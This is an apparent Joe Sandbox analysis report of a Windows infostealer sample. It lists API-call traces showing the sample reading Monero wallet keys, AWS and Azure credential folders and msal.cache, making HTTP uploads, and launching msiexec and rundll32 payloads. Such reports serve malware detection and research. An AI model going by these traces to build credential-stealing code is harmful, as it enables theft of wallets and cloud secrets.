                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0093D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0093D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D208
                              • lstrcat.KERNEL32(?,00951478), ref: 0093D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D22A
                              • lstrcat.KERNEL32(?,0095147C), ref: 0093D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D24C
                              • lstrcat.KERNEL32(?,00951480), ref: 0093D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D26E
                              • lstrcat.KERNEL32(?,00951484), ref: 0093D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D290
                              • lstrcat.KERNEL32(?,00951488), ref: 0093D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D2B2
                              • lstrcat.KERNEL32(?,0095148C), ref: 0093D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0093D2D4
                              • lstrcat.KERNEL32(?,00951490), ref: 0093D2E3
                                • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                              • lstrlen.KERNEL32(?), ref: 0093D32A
                              • lstrlen.KERNEL32(?), ref: 0093D339
                                • Part of subcall function 0094AA70: StrCmpCA.SHLWAPI(010F8848,0093A7A7,?,0093A7A7,010F8848), ref: 0094AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0093D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 688c262f0536dc4bf818dfdf429321edb5b38f432cdc8452ee2adbbf9a17b9fb
                              • Instruction ID: 0efed66bf2ac873817bb1267263d53ccd3eb6683788f26173b2489da399b3c43
                              • Opcode Fuzzy Hash: 688c262f0536dc4bf818dfdf429321edb5b38f432cdc8452ee2adbbf9a17b9fb
                              • Instruction Fuzzy Hash: 34E14B72950108ABEB04EBA0DD96FEE7379FF94305F104158F106B71A1DE35AE4ACB62
                              Function 00934880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00934915
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 0093493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00934ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00950DDB,00000000,?,?,00000000,?,",00000000,?,010FE288), ref: 00934DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00934E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00934E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00934E49
                              • InternetCloseHandle.WININET(00000000), ref: 00934EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00934EC5
                              • HttpOpenRequestA.WININET(00000000,010FE3B8,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00934B15
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • InternetCloseHandle.WININET(00000000), ref: 00934ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                              • Instruction ID: 242705127d79173be2e7755ded0450c764b67662c7be961f13c8b58c1683e81a
                              • Opcode Fuzzy Hash: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                              • Instruction Fuzzy Hash: E112EA72950118AAEB19EB90DCA2FEEB378FF94304F514199B10663191EF702F49CF66
                              Function 0093C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,010FCE60,00000000,?,0095144C,00000000,?,?), ref: 0093CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0093CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0093CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0093CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0093CAD9
                              • StrStrA.SHLWAPI(?,010FCE78,00950B52), ref: 0093CAF7
                              • StrStrA.SHLWAPI(00000000,010FCEA8), ref: 0093CB1E
                              • StrStrA.SHLWAPI(?,010FCFC0,00000000,?,00951458,00000000,?,00000000,00000000,?,010F87D8,00000000,?,00951454,00000000,?), ref: 0093CCA2
                              • StrStrA.SHLWAPI(00000000,010FD040), ref: 0093CCB9
                                • Part of subcall function 0093C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                • Part of subcall function 0093C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                              • StrStrA.SHLWAPI(?,010FD040,00000000,?,0095145C,00000000,?,00000000,010F8998), ref: 0093CD5A
                              • StrStrA.SHLWAPI(00000000,010F8B98), ref: 0093CD71
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                              • lstrlen.KERNEL32(00000000), ref: 0093CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0093CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 1194155d6719928ac2a34b0e923b0aaf61652d5a27d8c6c92debb3fbdb58e2d3
                              • Instruction ID: fb0f8a0bed91724475b8967dc5d5b5c5b98781a3eaa913f7802fe3aaa6a01899
                              • Opcode Fuzzy Hash: 1194155d6719928ac2a34b0e923b0aaf61652d5a27d8c6c92debb3fbdb58e2d3
                              • Instruction Fuzzy Hash: 02E10D71950108ABEB14EBA0DC92FEEB778EF94304F404159F506B7191EF306A8ACF66
                              Function 00948320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • RegOpenKeyExA.ADVAPI32(00000000,010FAF08,00000000,00020019,00000000,009505B6), ref: 009483A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                              • wsprintfA.USER32 ref: 00948459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                              • Instruction ID: d955f196088392a036599b3452d2b94729232716021fdcc36357fa3a3035eb42
                              • Opcode Fuzzy Hash: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                              • Instruction Fuzzy Hash: 09812BB1950118ABEB68DF54CC91FEEB7B8FF88704F008298E109A6180DF706B85CF95
                              Function 00944D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00944DCD
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                              • lstrcat.KERNEL32(?,00000000), ref: 00944E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00944E59
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00944EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00944EE5
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449B0
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,009508D2), ref: 009449C5
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449E2
                                • Part of subcall function 00944910: PathMatchSpecA.SHLWAPI(?,?), ref: 00944A1E
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,010FE278), ref: 00944A4A
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FF8), ref: 00944A5C
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A70
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FFC), ref: 00944A82
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A96
                                • Part of subcall function 00944910: CopyFileA.KERNEL32(?,?,00000001), ref: 00944AAC
                                • Part of subcall function 00944910: DeleteFileA.KERNEL32(?), ref: 00944B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 7d94b0a59b46616ef3d5bc1f12dc814a851f815577c0c8685937defa1a9c410a
                              • Instruction ID: 16a60798d29ef437ec3cd46ed02c4efe105f14871bd82567acc28012feaedaf1
                              • Opcode Fuzzy Hash: 7d94b0a59b46616ef3d5bc1f12dc814a851f815577c0c8685937defa1a9c410a
                              • Instruction Fuzzy Hash: A24163BA94020467DB54F770EC47FEE7338ABE4705F404594B689660C1EEB46BCD8B92
                              Function 00949010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                              • Instruction ID: ffdebac5cb52f7b8db60e5fc83bd1f4f962d87bf221f5c12ee654be320677bba
                              • Opcode Fuzzy Hash: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                              • Instruction Fuzzy Hash: C471EE71910208ABDB44EFE4DC89FEEB7B9BF88700F108508F51AA7290DF74A945CB61
                              Function 00942E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009431C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0094335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009434EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                              • Instruction ID: 2cbdb4b7556286c8c9c3673ed750da3b511fb047730361caf4a37aad55bcf0d2
                              • Opcode Fuzzy Hash: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                              • Instruction Fuzzy Hash: C3120C71850108AAEB19FBA0DC92FEEB738EF94304F504159F50676191EF342B4ACFA6
                              Function 009452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                                • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                                • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                              • lstrlen.KERNEL32(00000000), ref: 0094532F
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                              • lstrlen.KERNEL32(00000000), ref: 00945383
                              • lstrlen.KERNEL32(00000000), ref: 009453AE
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
